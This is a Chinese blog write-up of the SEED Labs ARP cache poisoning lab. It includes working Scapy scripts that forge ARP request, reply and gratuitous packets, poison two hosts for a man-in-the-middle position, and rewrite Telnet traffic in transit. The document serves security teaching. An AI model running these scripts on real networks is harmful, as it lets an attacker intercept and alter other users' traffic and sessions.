【SEED Lab】ARP Cache Poisoning Attack Lab

最新推荐文章于 2024-04-29 10:40:41 发布
最新推荐文章于 2024-04-29 10:40:41 发布
阅读量1.6k 收藏 14
点赞数 2
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43599063/article/details/125698880
版权

ARP Cache Poisoning Attack Lab

一、实验的基本环境

在这里插入图片描述
一共有三台机器,我们使用Host M进行攻击,因为ARP协议只在局域网上运行,所以三台机器在同一个局域网上面。

二、实验具体细节

Task 1: ARP Cache Poisoning

Task 1.A (using ARP request).

实验目的:在主机 M 上,构造一个 ARP 请求包,发送给主机 A。查看主机 A 的 ARP 缓存中 M 的 MAC 地址是否映射到 B 的 IP 地址。
1.首先要进入hostA和主机M,因为ARP协议只能在局域网内才有用。
在这里插入图片描述
2.查看主机A里面的ARP缓存看是否已经缓存了B,如果有就要删除。

在这里插入图片描述
3.编写代码。

#!/usr/bin/python3 
from scapy.all import * 
# M
src_mac='02:42:0a:09:00:69'# M
dst_mac='00:00:00:00:00:00' 
dst_mac_eth='ff:ff:ff:ff:ff:ff' 
src_ip='10.9.0.6' # B 
dst_ip='10.9.0.5' # 任意 IP 
eth = Ether(src=src_mac,dst=dst_mac_eth) 
arp = ARP(hwsrc=src_mac, psrc=src_ip,  pdst=dst_ip, op=1) 
pkt = eth / arp 
sendp(pkt)

4.运行并查看结果,主要代码要在主机M里面运行。
在这里插入图片描述
在这里插入图片描述

Task 1.B (using ARP reply).

在主机 M 上,构造一个 ARP 应答包,发送给主机 A。在 A 的 ARP 缓存中检查 M 的 MAC 地址是否映射到 B 的 IP 地址。
1.刚才前面实验中主机A的ARP缓存中已经有了B的地址,所以第一步要把,B的地址进行删除。
在这里插入图片描述
2.构造一个 ARP 应答包代码。

#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='02:42:0a:09:00:05' # A
src_ip='10.9.0.6' # B
dst_ip='10.9.0.5' # A
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)

3.查看结果
在这里插入图片描述
在这里插入图片描述

Task 1.C (using ARP gratuitous message).

这部分是通过ARP免费报文来实施ARP缓存投毒攻击。免费ARP报文是一种特殊的ARP报文,该报文携带的发送端IP地址和目标IP地址都是本机地址,报文源MAC地址是本机地址,目的MAC地址是广播地址,以太网头中的目的MAC地址也是广播地址。

设备通过对外发送免费ARP报文来实现以下功能:

1.确定其它设备的IP地址是否与本机的IP地址冲突。当其它设备收到免费ARP报文后,如果发现报文中的IP地址和自己的IP地址相同,则给发送免费ARP报文的设备返回一个ARP应答,告知该设备IP地址冲突。

2.设备改变了硬件地址,通过发送免费ARP报文通知其它设备更新ARP表项。
编写代码。

#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='ff:ff:ff:ff:ff:ff' # broadcast MAC address
src_ip='10.9.0.6' # B
dst_ip='10.9.0.6' # B
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)

查看结果。
在这里插入图片描述
在这里插入图片描述

Task 2: MITM Attack on Telnet using ARP Cache Poisoning

这部分主要是通过ARP缓存投毒来对telnet实施中间人攻击。
在这里插入图片描述

Step 1 (Launch the ARP cache poisoning attack)

此处需要实施的是中间人攻击,这部分可以参考Task1的scapy使用方法,可以通过伪造ARP数据包来完成。
Poisoning host A的思路是,src的IP地址是host B的IP地址,dst的IP地址是host A的IP地址。src的MAC地址是中间人M的MAC地址,dst的MAC地址是广播broadcast的MAC地址,即’ff:ff:ff:ff:ff:ff’。这样做的目的是使得host A将自己的ARP Cache设置为host B的IP对应到了中间人M的MAC地址,这样就成功使A的ARP Cache中毒。
同理,对于host B的Poisoning的思路也一样。
1.编写代码。

#!/usr/bin/python3
from scapy.all import *

broadcast_mac = "FF:FF:FF:FF:FF:FF"
# machine A
A_mac = "02:42:0a:09:00:05"
A_ip = "10.9.0.5"
# machine B
B_mac = "02:42:0a:09:00:06"
B_ip = "10.9.0.6"
# machine M
M_mac = "02:42:0a:09:00:69"
M_ip = "10.9.0.105"

# attack machine A
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=B_ip, pdst=A_ip)
sendp(E/A)
# attack machine B
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=A_ip, pdst=B_ip)
sendp(E/A)

2.查看攻击结果。
在这里插入图片描述

Step 2 (Testing).

上面我们完成了攻击,这里我们在A机器上ping B机器,在B机器上ping A机器测试一下。在测试开始前确保主机M的路由转发是关闭的。
在这里插入图片描述
1.在主机A里面pingB。
在这里插入图片描述
在这里插入图片描述
2.在主机B中pingA。
在这里插入图片描述
在这里插入图片描述
原因如下:以在B机器上ping A机器为例, 发送的icmp包链路层本应该是机器A的ip对应的MAC地址,但是由于ARP中毒攻击,缓存中机器A的ip对应的MAC地址是机器M的MAC地址,而IP层的目的地址是机器A的IP地址。所以机器M收到这个包,看到包中的目的MAC地址与自己的一样,会收下来,但是IP层的目的IP是机器A的IP地址,与自己的对不上,会丢弃该包。
机器A看到包中的目的MAC地址与自己的不一样,不会收,所以ping失败。

Step 3 (Turn on IP forwarding)

使用下面的命令在M机器上打开数据包转发功能。所谓转发即当主机拥有多于一块的网卡时,其中一块收到数据包,根据数据包的目的ip地址将数据包发往本机另一块网卡,该网卡根据路由表继续发送数据包。这通常是路由器所要实现的功能。
在这里插入图片描述
打开后就可以实现A与B 的正常ping。
在这里插入图片描述

Step 4 (Launch the MITM attack).

在这个步骤中要不断的对主机A和B进行poison攻击。
最后一步实行中间人攻击。
1.我们先在机器M上打开包转发功能,然后在机器A上telnet机器B,输入用户名密码,可以连上,可以正常输入命令并返回结果。然后在机器M上关闭包转发功能,再输入命令,可以发现无法输入,因为此时关闭包转发后,机器A和机器B已经无法通信
在这里插入图片描述
在这里插入图片描述
2.建立连接后,使用以下命令关闭IP转发。
在这里插入图片描述
3.在关闭转发后,在主机A中再输入命令,可以发现无法输入,因为此时关闭包转发后,机器A和机器B已经无法通信。
在这里插入图片描述
4.代码编写。

#!/usr/bin/python3
from scapy.all import *
 
VM_A_IP = "10.9.0.5"
VM_B_IP = "10.9.0.6"
def spoof_pkt(pkt):
    if pkt[IP].src == VM_A_IP and pkt[IP].dst == VM_B_IP and pkt[TCP].payload:
       # Create a new packet based on the captured one.
       # (1) We need to delete the checksum fields in the IP and TCP headers,
       # because our modification will make them invalid.
       # Scapy will recalculate them for us if these fields are missing.
       # (2) We also delete the original TCP payload.
       newpkt = pkt[IP]
       del(newpkt.chksum)
       del(newpkt[TCP].chksum)
       del(newpkt[TCP].payload)
       #####################################################################
       # Construct the new payload based on the old payload.
       # Students need to implement this part.
       #olddata = pkt[TCP].payload.load # Get the original payload data
       newdata = str.encode('Z') # No change is made in this sample code
       #newdata = "Z" * len(olddata)
       #####################################################################
       # Attach the new data and set the packet out
       send(newpkt/newdata)
    elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:
         send(pkt[IP]) # Forward the original packet
pkt = sniff(filter="ether src host not 02:42:0a:09:00:69 and tcp",prn=spoof_pkt)

5.实验结果,无论输入什么都会显示为Z。
在这里插入图片描述

偶不是小明
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ARP缓存中毒实验报告.docx
10-15
内含完整实验过程 ARP缓存是ARP协议的重要组成部分。一旦MAC地址和IP地址之间的映射被解析为执行ARP协议的结果,映射将被缓存。因此,如果映射已经在缓存中,则不需要重复ARP协议。然而,由于ARP协议是无状态的,所以高速缓存可能会被恶意制作的ARP消息中毒(篡改)。这种攻击称为ARP缓存中毒攻击。在这种攻击中,攻击者使用欺骗ARP消息欺骗受害者接受无效的MAC-IP映射,并将映射存储在其缓存中。
SEED Labs 2.0】ARP Cache Poisoning Attack Lab
Chenyang的博客
08-27 6437
本文为 SEED Labs 2.0 - ARP Cache Poisoning Attack Lab 的实验记录。本实验内容较为简单,需要注意的是每一个任务中源 mac、源 ip、目的 mac、目的 ip 以及 op 不要搞错了。
A Cache Poisoning Attack Targeting DNS Forwarding Devices
11-20
在本文中,我们提出了一个针对域名系统转发器的缓存中毒攻击。通过这种攻击,攻击者可以使用受控域注入任意受害域名的恶意记录,并绕过广泛部署的缓存中毒防御。通过对流行的家庭路由器模型和DNS软件进行测试,我们发现了几个易受攻击的实现,包括大型供应商的实现(例如,D-Link、Linksys、dnsmasq和MS DNS)。此外,通过一项全国性的测量,我们估计了使用易受攻击的域名系统转发器的中国移动客户的数量。我们已经向受影响的供应商报告了该问题,到目前为止,已经收到了其中三家供应商的积极反馈。我们的工作进一步表明,域名系统转发器可以成为域名系统基础设施中的一个软肋,并呼吁社区给予关注和实施指导。
arp扫描
12-15
arp扫描
ARP-Poison.rar_arp poisoning_attack_attack arp_poison
09-15
source code attack arp poisoning in c++.
内网ARP投毒攻击.PDF
06-21
该文档为ARP投毒攻击的原理步骤以及防御对策的概括性总结
Seedlabs】ARP Cache Poisoning Attack Lab
seven49的博客
04-06 5326
目录 一、实验环境 二、实验内容 Task 1: ARP Cache Poisoning Task 2: MITM Attack on Telnet using ARP Cache Poisoning 一、实验环境 本地共有三台虚拟机,位于同一个子网下。地址如下: 主机名 IP 地址 MAC 地址 M (攻击者) 10.9.0.105 02:42:0a:09:00:69 A (客户端) 10.9.0.5 02:42:0a:09:00:05 .
SEED-Lab) ARP Cache Poisoning Attack Lab
lunan的博客
02-17 6063
SEED-Lab) ARP Cache Poisoning Attack Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) ARP Cache Poisoning Attack Lab一、实验目标二、实验原理三、实验过程3.1 Task 1: ARP Cache Poisoning3.1.1 Task1A(using ARP request)3.1.2 Task 1B (using ARP reply)3.1.3 Task 1C (us
SeedLabARP Cache Poisoning Attack Lab
cold_windx的博客
08-29 1346
Attacker的主机上向HostA发送一则免费ARP,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。在Attacker的主机上向HostA发送一则ARP回复,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。接下来,我们清空掉HostA的ARP缓存,在尝试一遍攻击。在Attacker的主机上向HostA发送一则ARP请求,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。...
ARP Cache Poisoning Attack LabSEED实验)
l4kjih3gfe2dcba1的博客
08-25 1726
ARP缓存区的污染真的很可怕呢。这次实验中我们仅使用了ARP的请求报文来进行污染缓存,效果并不是很理想,A有时仍会收到B的请求而造成攻击短时性失效。如果task1中的三种报文都被利用来进行污染的话,可以想象得到这种攻击将会万无一失。但与此同时,使用python进行MITM或许有可能是受限于虚拟机的效率,或在真实环境下的网络波动都会造成一定程度的延迟。受害者双方如果能够基于时延进行判断,或许能够一定程度减少攻击的成功概率;与此同时,攻击者也可以修改报文的时间戳,或通过镜像转发,实现自己的攻击目标。
ARP防护软件
08-19
ARP防护软件系统结构:取本机默认网关IP,锁定IP_MAC地址,取MAC地址,======窗口程序集1||||------_按钮2_被单击||||------_按钮1_被单击||||------_最小化_被选择||||------_锁定网关_被选择||||------_解除
ARP_poisoning_detector:ARP中毒攻击的简单检测器
06-10
ARP中毒检测器 ARP中毒攻击的简单检测器 安装 sudo apt-get install python-scapy wget -q https://raw.githubusercontent.com/Oros42/ARP_poisoning_detector/master/arp_poisoning_detector.py 跑步 sudo python arp_poisoning_detector.py 输出示例 $ sudo python arp_poisoning_detector.py WARNING: No route found for IPv6 destination :: (no default route?) Init ARP : 192.168.1.254 = ab:cd:ef:98:76:54 192.168.1.5 = 01:23:45:67:89:10
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
Towards Data Poisoning Attack against Knowledge Graph Embedding.pdf
08-09
Knowledge graph embedding (KGE) is a technique for learning continuousembeddingsfor entities and relations in the knowledge graph. Due to its benefit to a variety of downstream tasks such as knowledge graph completion, question answering and recommendation, KGE has gained significant attention recently. Despite its effectiveness in a benign environment, KGE’s robustness to adversarialattacks is not well-studied. Existing attack methods on graph data cannot be directly applied to attack the embeddings of knowledge graph due to its heterogeneity. To fill this gap, we propose a collection of data poisoning attack strategies, which can effectively manipulate the plausibility of arbitrary targeted facts in a knowledge graph by adding or deleting facts on the graph. The effectiveness and efficiency of the proposed attack strategies are verified by extensive evaluations on two widely-used benchmarks.
ARP4761简介
09-10
ARP4761标准的简单介绍,有需要的可以参考,主要针对行业标准的内容概述
tcpip实验指导书
05-26
这是一份TCPIP的实验指导书
note-seed-labs:种子实验室笔记
03-14
网络安全种子实验室 打包发布 mkdocs build fab dev_upload
前端调用WebSocket协议接口获取数据
最新发布
m0_56023096的博客
04-29 248
createWs("测试数据", (res) => {
万兆以太网MAC设计(11)完整UDP协议栈仿真
m0_56222647的博客
04-28 853
目前除了巨帧处理逻辑之外,所有的准备工作都已经结束了,先进行整体的功能验证。
arp欺骗和arp攻击
03-27
ARP欺骗(Address Resolution Protocol spoofing)也称ARP攻击(ARP poisoning),是一种利用ARP协议漏洞的网络攻击方式。ARP协议是用于解决IP地址和MAC地址之间的映射关系的协议,当一个主机需要发送数据时,会先查询目标主机的MAC地址,如果目标主机的MAC地址未知,则会广播ARP请求,请求目标主机回应其MAC地址。ARP欺骗攻击者会发送伪造的ARP响应,欺骗其他主机将攻击者的MAC地址误认为是目标主机的MAC地址,导致数据被发送到攻击者的主机上,攻击者可以窃取数据或进行中间人攻击等恶意行为。 为了防止ARP欺骗攻击,可以采取以下措施: 1. 使用静态ARP表:手动将IP地址和MAC地址进行绑定,避免使用ARP请求广播寻址。 2. 使用ARP防火墙:对于不合法的ARP请求进行过滤和阻止。 3. 使用加密协议:使用HTTPS等加密协议来加密数据,避免中间人攻击。 4. 使用网络入侵检测系统:对于异常的ARP请求进行检测和报警。 5. 定期更改密码:避免密码被窃取后被用于ARP欺骗攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值